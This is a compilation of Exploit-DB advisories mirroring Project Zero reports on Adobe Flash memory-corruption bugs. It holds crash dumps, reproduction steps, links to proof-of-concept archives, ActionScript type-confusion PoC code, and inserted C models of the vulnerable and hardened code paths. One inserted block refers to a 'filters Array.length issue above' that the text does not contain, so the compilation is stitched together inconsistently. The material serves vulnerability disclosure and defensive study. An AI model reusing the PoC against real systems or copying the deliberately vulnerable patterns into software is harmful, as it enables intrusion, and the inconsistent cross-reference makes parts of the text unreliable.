https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

To reproduce, host the attached files appropriately, and:

http://localhost/LoadMP4.swf?file=crash3006694.flv

If there is no crash at first, refresh the page a few times.

With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:

=> 0x00007f7779846eee:	mov    %ax,(%rdi,%rdx,2)

rax            0xff69
rdi            0x7f7778b70000
rdx            0x160b

7f777861e000-7f7778b72000 rw-p 00000000 00:00 0 
7f7778b72000-7f7779228000 ---p 00000000 00:00 0 

It looks like an indexing error: the rdi "base" address is in bounds, but once 2*rdx is added the resulting address is not.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37880.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:

class subso extends Sound {

	public function subso(f) {
		super("_level0.test");
		var n = {valueOf : func};
		_global.func = f;
		_global.t = this;
		var f2 = this.loadSound;
		f2.call(this, n, 1);
	}

	function func() {
		_global.func(_global.t, "/sosuper.swf", "/sosuper.swf");
		return 1;
	}
}

A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
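This SharedObject/loadSound issue and the filters Array.length issue above (the incomplete 18.0.0.203 check) have the same shape: a native operation calls back into script between a check and the use that depends on it. The C model below is an added example, not Adobe's code; `ScriptObj`, `Vm`, `to_number` and the hook names are constructed stand-ins for the Flash objects, and the hardened variants show the fix a defender wants: re-validate after every call that can re-enter script, or run all such calls before the check.

```c
/* Constructed model of the two Flash re-entrancy bugs described above; not Adobe code. */
#include <stdbool.h>
typedef enum { T_SOUND, T_SHARED_OBJECT } ScriptType;
typedef struct { ScriptType type; bool alive; } ScriptObj;  /* object as native code sees it */

/* Callback run by any operation that re-enters the VM (Array.length, valueOf, ...).
   The harness installs it; in the PoCs it is the attacker-supplied valueOf. */
typedef void (*ScriptHook)(ScriptObj *reachable, int call_no);
typedef struct { ScriptHook hook; int calls; } Vm;

/* Converting a script value to a number may run script that can reach `obj`. */
static int to_number(Vm *vm, ScriptObj *obj) {
    if (vm->hook) vm->hook(obj, ++vm->calls);
    return 10;                                   /* the length the PoC's valueOf returns */
}
enum { OK = 0, BAILED = 1, USE_AFTER_FREE = -1, TYPE_CONFUSED = -2 };

/* Flash 18.0.0.203 filters setter: liveness is checked after the first length read only. */
int set_filters_patched_once(Vm *vm, ScriptObj *filter) {
    if (to_number(vm, filter) <= 0) return OK;
    if (!filter->alive) return BAILED;           /* the check the patch added */
    if (to_number(vm, filter) <= 0) return OK;   /* second read: script runs again */
    return filter->alive ? OK : USE_AFTER_FREE;  /* real code dereferences here unchecked */
}

/* Hardened: re-validate after every call that can re-enter script. */
int set_filters_hardened(Vm *vm, ScriptObj *filter) {
    if (to_number(vm, filter) <= 0) return OK;
    if (!filter->alive) return BAILED;
    if (to_number(vm, filter) <= 0) return OK;
    if (!filter->alive) return BAILED;
    return OK;                                   /* only now is `filter` safe to use */
}

/* Sound.loadSound pattern: type checked, an argument converted (runs script), then cast. */
int load_sound_vulnerable(Vm *vm, ScriptObj *self) {
    if (self->type != T_SOUND) return BAILED;    /* check ... */
    (void)to_number(vm, self);                   /* ... script may retype `self` ... */
    return self->type == T_SOUND ? OK : TYPE_CONFUSED;  /* ... cast trusts the stale check */
}

/* Hardened: finish every script-re-entering conversion first, then check and cast. */
int load_sound_hardened(Vm *vm, ScriptObj *self) {
    (void)to_number(vm, self);
    if (self->type != T_SOUND || !self->alive) return BAILED;
    return OK;
}

/* Harness hooks standing in for the PoCs' valueOf, and a runner giving fresh state. */
void hook_free_on_call2(ScriptObj *o, int n) { if (n == 2) o->alive = false; }
void hook_retype_on_call1(ScriptObj *o, int n) { if (n == 1) o->type = T_SHARED_OBJECT; }
int run_scenario(int (*op)(Vm *, ScriptObj *), ScriptHook hook) {
    Vm vm = { hook, 0 }; ScriptObj obj = { T_SOUND, true };
    return op(&vm, &obj);
}
```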

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37881.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.

The crash looks like this on Linux x64:

=> 0x00007f6931226f22:	mov    0x8(%rcx),%eax
rcx            0x303030303030300	217020518514230016

The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:

=> 0x00007f6931226f22:	mov    0x8(%rcx),%eax    <--- read
   0x00007f6931226f25:	test   %eax,%eax
   0x00007f6931226f27:	je     0x7f6931226f80
   0x00007f6931226f29:	test   $0x40000000,%eax
   0x00007f6931226f2e:	jne    0x7f6931226f80
   0x00007f6931226f30:	add    $0x1,%eax         <--- increment
   0x00007f6931226f33:	cmp    $0xff,%al
   0x00007f6931226f35:	mov    %eax,0x8(%rcx)    <--- write back

The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37870.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64-bit platforms.
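An added example (not Adobe's code) of how the size computation described above wraps and how to compute it safely. The expansion factor of 6 and the "32-bit allocation size, full-width copy length" mechanism are assumptions inferred from the threshold 0x2aaaaaaa (which is UINT32_MAX / 6) and the 64-bit-only note; `converted_size_32`, `vulnerable_flow_overflows` and `converted_size_checked` are constructed names.

```c
/* Constructed example for the ID3 size computation described above; not Adobe code. */
#include <stdint.h>

/* Assumption: each compressed byte can expand to up to 6 bytes of converted string
   data. 6 is inferred from the report's threshold: 0x2aaaaaaa == UINT32_MAX / 6, so
   one byte more makes a 32-bit product wrap around. */
#define EXPANSION 6u

/* Vulnerable shape: the allocation size is computed in 32 bits and wraps. */
uint32_t converted_size_32(uint32_t compressed_len) {
    return compressed_len * EXPANSION;           /* 0x2aaaaaab * 6 wraps to 2 */
}

/* Assumed mechanism behind "only on 64-bit": the copy length is computed at full
   width while the allocation used the wrapped 32-bit value. Returns 1 when the copy
   would run past the buffer (the large copy into a small buffer the report describes). */
int vulnerable_flow_overflows(uint32_t compressed_len) {
    uint32_t alloc_size = converted_size_32(compressed_len);
    uint64_t copy_len = (uint64_t)compressed_len * EXPANSION;
    return copy_len > alloc_size;
}

/* Hardened: compute the size at a width that cannot wrap and enforce a policy cap
   before allocating (ID3v2 tag sizes are 28-bit, so a cap near 0x0FFFFFFF is generous).
   Returns the size to allocate, or -1 to reject the tag. */
int64_t converted_size_checked(uint32_t compressed_len, uint64_t max_alloc) {
    uint64_t need = (uint64_t)compressed_len * EXPANSION;   /* < 2^35, cannot wrap */
    return need > max_alloc ? -1 : (int64_t)need;
}
```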

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37882.zip